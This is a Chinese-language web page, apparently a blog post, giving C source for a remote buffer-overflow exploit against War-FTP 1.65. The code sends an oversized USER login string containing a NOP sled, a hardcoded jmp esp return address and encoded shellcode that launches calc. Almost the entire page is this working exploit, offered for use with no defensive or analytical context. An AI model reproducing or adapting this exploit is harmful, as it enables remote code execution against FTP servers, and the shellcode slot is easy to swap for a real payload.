当前位置: 首页 > 工具软件 > War FTP > 使用案例 >

warftp缓存区溢出攻击C代码

谷梁浩思
2023-12-01

    针对war-ftp 1.65,当用户在执行登录时,若其用户名输入长度大于485,则会发生溢出错误,下面给出一段示例代码:


#include <stdio.h>
#include <winsock.h>
#pragma comment(lib,"ws2_32")

#define JUMPESP "\x12\x45\xfa\x7f"


// exec calc
char shellcode[] = 
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42"
"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a"
"\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c"
"\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57"
"\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50"
"\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d"
"\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f"
"\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a"
"\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76"
"\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65"
"\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78"
"\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f"
"\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65"
"\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d"
"\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31"
"\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69"
"\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61"
"\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70"
"\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42";


int main(int argc,char* argv[])
{
	WSADATA WSAData;    
    char buf[3008];
	struct sockaddr_in ipAddress;
    SOCKET s;
    if (argc < 3)
    {
        fprintf(stderr, "Usage: %s remote_addr remote_port", argv[0]);
        exit(1);
    }
    if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
    {
        printf("[-] WSAStartup failed.\n");
        WSACleanup();
        exit(1);
    }
    s = socket(AF_INET,SOCK_STREAM,0);
    ipAddress.sin_family = AF_INET;
    ipAddress.sin_addr.s_addr = inet_addr(argv[1]);
   
    ipAddress.sin_port = htons(atoi(argv[2]));
    connect(s,(struct sockaddr *)&ipAddress,sizeof(ipAddress));
	memset(buf,0x90,sizeof(buf)-1);
	memcpy(buf,"USER ",5);
	memcpy(buf+5+485,JUMPESP,4);                     //jmp esp:77d7c5fb
	memcpy(buf+5+485+4+10,shellcode,sizeof(shellcode)-1);
	memcpy(buf+5+485+4+10+sizeof(shellcode)-1,"\r\n",sizeof("\r\n"));
 
	 char sbuf[1023] ;
	 int i = recv(s,sbuf,sizeof(sbuf),0);
	 sbuf[i] = '\0';
	 printf("%s\n",sbuf);
     SOCKET ret=send(s,buf,sizeof(buf)-1,0);
     if(ret<0)
	 {
         printf("send err\n");
         return -1;
	 }
	 printf("发送成功");
     send(s,"PASS liu \r\n",sizeof("PASS liu \r\n")-1,0); 
     WSACleanup();
	 return 1;
}


 类似资料: